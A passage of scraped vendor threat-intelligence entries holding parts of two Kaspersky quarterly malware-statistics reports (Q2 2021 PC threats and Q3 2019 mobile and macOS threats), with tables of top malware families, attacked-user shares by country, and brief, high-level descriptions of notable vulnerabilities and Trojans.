[CVE-2021-30661](<https://support.apple.com/en-us/HT212317>) \u2014 a use-after-free vulnerability; [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>) \u2014 a memory corruption vulnerability; and [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>) \u2014 an integer overflow vulnerability.\n\nAll of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an 
unpatched browser.\n\nIn Q2, two similar vulnerabilities were found ([CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) and [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>)), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.\n\nBut the biggest talking point of the quarter was the [critical vulnerabilities CVE-2021-1675 and CVE-2021-34527](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a [proof of concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available [risk mitigation methods](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) against these vulnerabilities have not been applied.\n\nAmong the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. 
Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include [CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>), a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability ([CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group.\n\n## Attacks on macOS\n\nAs for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. 
During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 14.47 \n2 | AdWare.OSX.Pirrit.ac | 13.89 \n3 | AdWare.OSX.Pirrit.o | 10.21 \n4 | AdWare.OSX.Pirrit.ae | 7.96 \n5 | AdWare.OSX.Bnodlero.at | 7.94 \n6 | Monitor.OSX.HistGrabber.b | 7.82 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.69 \n8 | AdWare.OSX.Bnodlero.bg | 7.28 \n9 | AdWare.OSX.Pirrit.aa | 6.84 \n10 | AdWare.OSX.Pirrit.gen | 6.44 \n11 | AdWare.OSX.Cimpli.m | 5.53 \n12 | Trojan-Downloader.OSX.Agent.h | 5.50 \n13 | Backdoor.OSX.Agent.z | 4.64 \n14 | Trojan-Downloader.OSX.Lador.a | 3.92 \n15 | AdWare.OSX.Bnodlero.t | 3.64 \n16 | AdWare.OSX.Bnodlero.bc | 3.36 \n17 | AdWare.OSX.Ketin.h | 3.25 \n18 | AdWare.OSX.Bnodlero.ay | 3.08 \n19 | AdWare.OSX.Pirrit.q | 2.84 \n20 | AdWare.OSX.Pirrit.x | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. 
The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141728/10-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | India | 3.77 \n2 | France | 3.67 \n3 | Spain | 3.45 \n4 | Canada | 3.08 \n5 | Italy | 3.00 \n6 | Mexico | 2.88 \n7 | Brazil | 2.82 \n8 | USA | 2.69 \n9 | Australia | 2.53 \n10 | Great Britain | 2.33 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. 
A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.\n\nTelnet | 70.55% \n---|--- \nSSH | 29.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 63.06% \n---|--- \nSSH | 36.94% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 30.25% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.93% \n3 | Backdoor.Linux.Mirai.ba | 5.82% \n4 | Backdoor.Linux.Agent.bc | 5.10% \n5 | Backdoor.Linux.Gafgyt.a | 4.44% \n6 | Trojan-Downloader.Shell.Agent.p | 3.22% \n7 | RiskTool.Linux.BitCoinMiner.b | 2.90% \n8 | Backdoor.Linux.Gafgyt.bj | 2.47% \n9 | Backdoor.Linux.Mirai.cw | 2.52% \n10 | Backdoor.Linux.Mirai.ad | 2.28% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q2 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can also be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. A total of 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141800/13-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 23.65 \n2 | Mauritania | 19.04 \n3 | Moldova | 18.88 \n4 | Ukraine | 18.37 \n5 | Kyrgyzstan | 17.53 \n6 | Algeria | 17.51 \n7 | Syria | 15.17 \n8 | Uzbekistan | 15.16 \n9 | Kazakhstan | 14.80 \n10 | Tajikistan | 14.70 \n11 | Russia | 14.54 \n12 | Yemen | 14.38 \n13 | Tunisia | 13.40 \n14 | Estonia | 13.36 \n15 | Latvia | 13.23 \n16 | Libya | 13.04 \n17 | Armenia | 12.95 \n18 | Morocco | 12.39 \n19 | Saudi Arabia | 12.16 \n20 | Macao | 11.67 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141830/14-en-malware-report-q2-2021-graphs-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2021, our File Anti-Virus detected **68,294,298** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 49.38 \n2 | Tajikistan | 48.11 \n3 | Afghanistan | 46.52 \n4 | Uzbekistan | 44.21 \n5 | Ethiopia | 43.69 \n6 | Yemen | 43.64 \n7 | Cuba | 38.71 \n8 | Myanmar | 36.12 \n9 | Syria | 35.87 \n10 | South Sudan | 35.22 \n11 | China | 35.14 \n12 | Kyrgyzstan | 34.91 \n13 | Bangladesh | 34.63 \n14 | Venezuela | 34.15 \n15 | Benin | 32.94 \n16 | Algeria | 32.83 \n17 | Iraq | 32.55 \n18 | Madagascar | 31.68 \n19 | Mauritania | 31.60 \n20 | Belarus | 31.38 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141906/15-en-malware-report-q2-2021-graphs-pc.png>))_\n\nOn average worldwide, **Malware-class** local 
threats were recorded on 15.56% of users' computers at least once during the quarter. Russia scored 17.52% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:12", "type": "securelist", "title": "IT threat evolution in Q2 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1472", "CVE-2021-1675", "CVE-2021-21220", "CVE-2021-28310", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-31166", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33742", "CVE-2021-34527"], "modified": "2021-08-12T10:00:12", "id": "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "href": "https://securelist.com/it-threat-evolution-in-q2-2021-pc-statistics/103607/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-29T14:41:16", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly 
figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky solutions blocked 989,432,403 attacks launched from online resources in 203 countries across the globe.\n * 560,025,316 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were blocked on the computers of 197,559 users.\n * Ransomware attacks were defeated on the computers of 229,643 unique users.\n * Our File Anti-Virus detected 230,051,054 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 870,617 malicious installation packages\n * 13,129 installation packages for mobile banking Trojans\n * 13,179 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nIn Q3 2019, we discovered an extremely [unpleasant incident](<https://securelist.com/dropper-in-google-play/92496/>) with the popular CamScanner app on Google Play. The new version of the app contained an ad library inside with the Trojan dropper Necro built in. Judging by the reviews on Google Play, the dropper's task was to activate paid subscriptions, although it could deliver another payload if required.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171243/malware-q3-2019-statistics-en-1.png>)\n\nAnother interesting Trojan detected in Q3 2019 is Trojan.AndroidOS.Agent.vn. Its main function is to \"like\" Facebook posts when instructed by its handlers. Interestingly, to make the click, the Trojan attacks the Facebook mobile app on the infected device, literally forcing it to execute its command.\n\nIn the same quarter, we discovered [new FinSpy spyware Trojans](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) for iOS and Android. In the fresh versions, the focus is on snooping on correspondence in messaging apps. 
The iOS version requires a [jailbreak](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) to do its job, while the Android version is able to spy on the encrypted Threema app among others.\n\n### Mobile threat statistics\n\nIn Q3 2019, Kaspersky detected 870,617 malicious installation packages.\n\n_Number of detected malicious installation packages, Q4 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171249/malware-q3-2019-statistics-en-2.png>)\n\nWhereas in previous quarters we observed a noticeable drop in the number of new installation packages, Q3's figure was up by 117,067 packages compared to the previous quarter.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of detected mobile apps by type, Q2 and Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/29125517/malware-q3-2019-statistics-en-3.png>)\n\nAmong all the mobile threats detected in Q3 2019, the lion's share went to potentially unsolicited RiskTool-class programs (32.1%), which experienced a fall of 9 p.p. against the previous quarter. The most frequently detected objects were in the RiskTool.AndroidOS families: Agent (33.07% of all detected threats in this class), RiskTool.AndroidOS.Wapron (16.43%), and RiskTool.AndroidOS.Smssend (10.51%).\n\nSecond place went to miscellaneous Trojans united under the Trojan class (21.68%); their share increased by 10 p.p. The distribution within the class was unchanged since the previous quarter, with the Trojan.AndroidOS.Hiddapp (32.5%), Trojan.AndroidOS.Agent (12.8%), and Trojan.AndroidOS.Piom (9.1%) families remaining in the lead. 
Kaspersky's machine-learning systems made a significant contribution to detecting threats: Trojans detected by this technology (the Trojan.AndroidOS.Boogr verdict) made up 28.7% \u2014 second place after Hiddapp.\n\nIn third place were Adware-class programs (19.89%), whose share rose by 1 p.p. in the reporting period. Most often, adware programs belonged to one of the following families: AdWare.AndroidOS.Ewind (20.73% of all threats in this class), AdWare.AndroidOS.Agent (20.36%), and AdWare.AndroidOS.MobiDash (14.27%).\n\nThreats in the Trojan-Dropper class (10.44%) remained at the same level with insignificant (0.5 p.p.) growth. The vast majority of detected droppers belonged to the Trojan-Dropper.AndroidOS.Wapnor family (69.7%). A long way behind in second and third place, respectively, were Trojan-Dropper.AndroidOS.Wroba (14.58%) and Trojan-Dropper.AndroidOS.Agent (8.75%).\n\n### TOP 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs classified as RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 48.71 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.03 \n3 | Trojan.AndroidOS.Hiddapp.ch | 7.24 \n4 | Trojan.AndroidOS.Hiddapp.cr | 7.23 \n5 | Trojan-Dropper.AndroidOS.Necro.n | 6.87 \n6 | DangerousObject.AndroidOS.GenericML | 4.34 \n7 | Trojan-Downloader.AndroidOS.Helper.a | 1.99 \n8 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.75 \n9 | Trojan-Dropper.AndroidOS.Agent.ok | 1.65 \n10 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.52 \n11 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.46 \n12 | Trojan-Downloader.AndroidOS.Necro.b | 1.45 \n13 | Trojan-Dropper.AndroidOS.Lezok.p | 1.44 \n14 | Trojan.AndroidOS.Hiddapp.cf | 1.41 \n15 | Trojan.AndroidOS.Dvmap.a | 1.27 \n16 | Trojan.AndroidOS.Agent.rt | 1.24 \n17 | Trojan-Banker.AndroidOS.Asacub.snt | 1.21 \n18 | Trojan-Dropper.AndroidOS.Necro.q | 1.19 \n19 | Trojan-Dropper.AndroidOS.Necro.l | 1.12 \n20 | Trojan-SMS.AndroidOS.Prizmes.a | 1.12 \n 
\n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nFirst place in our TOP 20 as ever went to DangerousObject.Multi.Generic (48.71%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nSecond and sixth places were claimed by Trojan.AndroidOS.Boogr.gsh (9.03%) and DangerousObject.AndroidOS.GenericML (4.34%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird, fourth, and fourteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to covertly foist ads onto victims.\n\nFifth, twelfth, eighteenth, and nineteenth positions went to Trojan droppers of the Necro family. Although this family showed up on the radar last quarter, really serious activity was observed only in this reporting period.\n\nSeventh place went to Trojan-Downloader.AndroidOS.Helper.a (1.99%), which is what members of the Necro family usually extract from themselves. Helper.a is tasked with downloading arbitrary code from malicious servers and running it.\n\nEighth place was taken by the malware Trojan-Banker.AndroidOS.Svpeng.ak (1.75%), the main task of which is to steal online banking credentials and intercept two-factor authorization codes.\n\nNinth position went to Trojan-Dropper.AndroidOS.Agent.ok (1.65%), which is distributed under the guise of FlashPlayer or a Rapidshare client. 
Most commonly, it drops adware modules into the infected system.\n\nTenth and eleventh places went to members of the Trojan-Banker.AndroidOS.Hqwar family. The popularity of this dropper among cybercriminals [continues to fall](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>).\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171307/malware-q3-2019-statistics-en-4.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware**\n\n| Country* | %** \n---|---|--- \n1 | Iran | 52.68 \n2 | Bangladesh | 30.94 \n3 | India | 28.75 \n4 | Pakistan | 28.13 \n5 | Algeria | 26.47 \n6 | Indonesia | 23.38 \n7 | Nigeria | 22.46 \n8 | Tanzania | 21.96 \n9 | Saudi Arabia | 20.05 \n10 | Egypt | 19.44 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q3's TOP 10, Iran (52.68%) retained top spot by share of attacked users. Note that over the reporting period the country's share almost doubled. Kaspersky users in Iran most often encountered the adware app AdWare.AndroidOS.Agent.fa (22.03% of the total number of mobile threats), the adware-installing Trojan.AndroidOS.Hiddapp.bn (14.68%) and the potentially unwanted program RiskTool.AndroidOS.Dnotua.yfe (8.84%).\n\nBangladesh (30.94%) retained second place in the ranking. 
Users in this country most frequently encountered adware programs, including AdWare.AndroidOS.Agent.f\u0441 (27.58% of the total number of mobile threats) and AdWare.AndroidOS.HiddenAd.et (12.65%), as well as Trojan.AndroidOS.Hiddapp.cr (20.05%), which downloads adware programs.\n\nIndia (28.75%) climbed to third place due to the same threats that were more active than others in Bangladesh: AdWare.AndroidOS.Agent.f\u0441 (36.19%), AdWare.AndroidOS.HiddenAd.et (17.17%) and Trojan.AndroidOS.Hiddapp.cr (22.05%).\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,129** installation packages for mobile banking Trojans, only 770 fewer than in Q2 2019.\n\nThe largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Svpeng (40.59% of all detected banking Trojans), Trojan-Banker.AndroidOS.Agent (11.84%), and Trojan-Banker.AndroidOS.Faketoken (11.79%) families.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171313/malware-q3-2019-statistics-en-5.png>)\n\n**TOP 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Svpeng.ak | 16.85 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 11.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.q | 8.97 \n4 | Trojan-Banker.AndroidOS.Asacub.ce | 8.07 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 5.51 \n6 | Trojan-Banker.AndroidOS.Asacub.a | 5.27 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 5.26 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 3.62 \n9 | Trojan-Banker.AndroidOS.Faketoken.snt | 2.91 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 2.81 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by banking threats._\n\nThe TOP 10 banking threats in Q3 2019 was headed by Trojans of the Trojan-Banker.AndroidOS.Svpeng family: Svpeng.ak (16.85%) took first place, and 
Svpeng.q (8.97%) third. This is not the first time we have detected amusing obfuscation in Trojans from Russian-speaking cybercriminals \u2014 this time the code of the malware Svpeng.ak featured the names of video games.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171317/malware-q3-2019-statistics-en-6.png>)\n\n_Snippets of decompiled code from Trojan-Banker.AndroidOS.Svpeng.ak_\n\nSecond, fourth, sixth, and tenth positions in Q3 went to the Asacub Trojan family. Despite a decrease in activity, Asacub samples are still found on devices around the world.\n\n_Geography of mobile banking threats, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171323/malware-q3-2019-statistics-en-7.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 0.30 \n2 | South Africa | 0.20 \n3 | Kuwait | 0.18 \n4 | Tajikistan | 0.13 \n5 | Spain | 0.12 \n6 | Indonesia | 0.12 \n7 | China | 0.11 \n8 | Singapore | 0.11 \n9 | Armenia | 0.10 \n10 | Uzbekistan | 0.10 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q3 Russia moved up to first place (0.30%), which impacted the entire pattern of mobile bankers spread around the world. Users in Russia were most often targeted with Trojan-Banker.AndroidOS.Svpeng.ak (17.32% of all attempts to infect unique users with mobile financial malware). The same Trojan made it into the TOP 10 worldwide. 
It is a similar story with second and third places: Trojan-Banker.AndroidOS.Asacub.snt (11.86%) and Trojan-Banker.AndroidOS.Svpeng.q (9.20%).\n\nSouth Africa fell to second place (0.20%), where for the second quarter in a row Trojan-Banker.AndroidOS.Agent.dx (89.80% of all mobile financial malware) was the most widespread threat.\n\nBronze went to Kuwait (0.21%), where, like in South Africa, Trojan-Banker.AndroidOS.Agent.dx (75%) was most often encountered.\n\n### Mobile ransomware Trojans\n\nIn Q3 2019, we detected 13,179 installation packages for mobile ransomware \u2014 10,115 fewer than last quarter. We observed a similar drop in Q2, so since the start of the year the number of mobile ransomware Trojans has decreased almost threefold. The reason, as we see it, is the decline in activity of the group behind the Asacub Trojan.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171329/malware-q3-2019-statistics-en-8.png>)\n\n**TOP 10 mobile ransomware Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 40.97 \n2 | Trojan-Ransom.AndroidOS.Small.as | 8.82 \n3 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.79 \n4 | Trojan-Ransom.AndroidOS.Rkor.i | 5.20 \n5 | Trojan-Ransom.AndroidOS.Rkor.h | 4.78 \n6 | Trojan-Ransom.AndroidOS.Small.o | 3.60 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ai | 2.93 \n8 | Trojan-Ransom.AndroidOS.Small.ce | 2.93 \n9 | Trojan-Ransom.AndroidOS.Fusob.h | 2.72 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 2.66 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q3 2019, the leading positions among ransomware Trojans were retained by members of the Trojan-Ransom.AndroidOS.Svpeng family. 
Top spot, as in the previous quarter, was claimed by Svpeng.aj (40.97%), with Svpeng.ah (5.79%) in third.\n\n_Geography of mobile ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171337/malware-q3-2019-statistics-en-9.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | US | 1.12 \n2 | Iran | 0.25 \n3 | Kazakhstan | 0.25 \n4 | Oman | 0.09 \n5 | Qatar | 0.08 \n6 | Saudi Arabia | 0.06 \n7 | Mexico | 0.05 \n8 | Pakistan | 0.05 \n9 | Kuwait | 0.04 \n10 | Indonesia | 0.04 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by share of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.12%), Iran (0.25%), and Kazakhstan (0.25%).\n\n## Attacks on Apple macOS\n\nQ3 saw a lull in the emergence of new threats. 
An exception was the distribution of a [modified version](<https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/>) of the Stockfolio investment app, which contained an encrypted reverse shell backdoor.\n\n### TOP 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 22.71 \n2 | AdWare.OSX.Pirrit.j | 14.43 \n3 | AdWare.OSX.Pirrit.s | 11.73 \n4 | AdWare.OSX.Pirrit.p | 10.43 \n5 | AdWare.OSX.Pirrit.o | 9.71 \n6 | AdWare.OSX.Bnodlero.t | 8.40 \n7 | AdWare.OSX.Spc.a | 7.32 \n8 | AdWare.OSX.Cimpli.d | 6.92 \n9 | AdWare.OSX.MacSearch.a | 4.88 \n10 | Adware.OSX.Agent.d | 4.71 \n11 | AdWare.OSX.Ketin.c | 4.63 \n12 | AdWare.OSX.Ketin.b | 4.10 \n13 | Downloader.OSX.InstallCore.ab | 4.01 \n14 | AdWare.OSX.Cimpli.e | 3.86 \n15 | AdWare.OSX.Bnodlero.q | 3.78 \n16 | AdWare.OSX.Cimpli.f | 3.76 \n17 | AdWare.OSX.Bnodlero.x | 3.49 \n18 | AdWare.OSX.Mcp.a | 3.26 \n19 | AdWare.OSX.MacSearch.d | 3.18 \n20 | AdWare.OSX.Amc.a | 3.15 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nLike last quarter, the adware Trojan Shlayer was the top threat for macOS. 
